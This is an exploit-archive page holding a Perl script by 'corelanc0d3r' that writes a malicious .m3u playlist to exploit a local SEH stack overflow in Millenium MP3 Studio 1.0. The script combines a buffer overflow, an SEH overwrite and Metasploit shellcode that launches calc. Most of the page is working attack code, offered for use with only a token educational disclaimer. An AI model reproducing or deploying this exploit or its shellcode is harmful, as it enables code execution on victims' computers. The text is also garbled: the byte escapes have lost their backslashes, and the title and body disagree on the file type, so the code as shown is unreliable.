[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update)
# Published : 2009-07-30
# Author : corelanc0d3r
# Previous Title : Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH)
# Next Title : Destiny Media Player 1.61 (.pls) Universal Buffer Overflow Exploit (SEH)
#
# [+] Vulnerability : .m3u File Local Stack Overflow Exploit (SEH) Full Rewrite
# [+] Product : Millenium MP3 Studio
# [+] Versions affected : v1.0
# [+] Download : http://www.software112.com/products/mp3-millennium+download.html
# [+] Method : seh
# [+] Tested on : Windows XP SP3 En
# [+] Written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com
# [+] Greetz to : Saumil & SK
# [+] Note : sorry for the previous version, that was a real mess
# I mixed up 2 sploits...
# This one should be a lot better
# -----------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
# eip hunters
# -----------------------------------------------------------------------------
#
# Script provided for educational purposes only.
#
#
#
my $sploitfile="C:\mp3-millennium\c0d3rmp3studio.m3u";
my $totallen=5007;
#
my $junk = "http://";
my $buffer="A" x 4103;
my $seh = "xebx1ex90x90"; #jump forest, jump !
my $nseh = pack('V',0x10020BA7); #pop pop ret from xaudio.dll
my $nop="x90" x 32;
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="x89xe6xdaxdbxd9x76xf4x58x50x59x49x49x49x49" .
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" .
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41" .
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42" .
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4b" .
"x58x50x44x45x50x43x30x43x30x4cx4bx51x55x47" .
"x4cx4cx4bx43x4cx45x55x43x48x45x51x4ax4fx4c" .
"x4bx50x4fx45x48x4cx4bx51x4fx47x50x45x51x4a" .
"x4bx51x59x4cx4bx50x34x4cx4bx45x51x4ax4ex50" .
"x31x49x50x4dx49x4ex4cx4cx44x49x50x42x54x43" .
"x37x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4b" .
"x44x47x4bx51x44x47x54x45x54x42x55x4bx55x4c" .
"x4bx51x4fx46x44x43x31x4ax4bx42x46x4cx4bx44" .
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c" .
"x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx51" .
"x34x45x54x48x43x51x4fx50x31x4ax56x43x50x51" .
"x46x45x34x4cx4bx47x36x46x50x4cx4bx47x30x44" .
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45" .
"x58x4bx39x4bx48x4bx33x49x50x43x5ax46x30x42" .
"x48x4ax50x4cx4ax44x44x51x4fx42x48x4ax38x4b" .
"x4ex4dx5ax44x4ex51x47x4bx4fx4ax47x42x43x45" .
"x31x42x4cx45x33x45x50x41x41";
my $shelllen = $totallen-length($junk)-length($buffer)-length($seh)-length($nseh)-length($nop)-length($shellcode);
my $finalnop="x90" x $shelllen;
my $payload=$junk.$buffer.$seh.$nseh.$nop.$shellcode.$finalnop;
#
#
print "[+] Writing exploit file $sploitfilen";
open (myfile,">$sploitfile");
print myfile $payload;
close (myfile);
print "[+] ".length($payload)." bytes written to filen";
print " junk : " . length($junk)."n";
print " buf : " . length($buffer)."n";
print " seh : " . length($seh)."n";
print " nseh : " . length($nseh)."n";
print " nop : " . length($nop)."n";
print " shell : " . length($shellcode)."n";
print " nop2 : " . length($finalnop)."n";
#
#
# www.Syue.com [2009-07-30]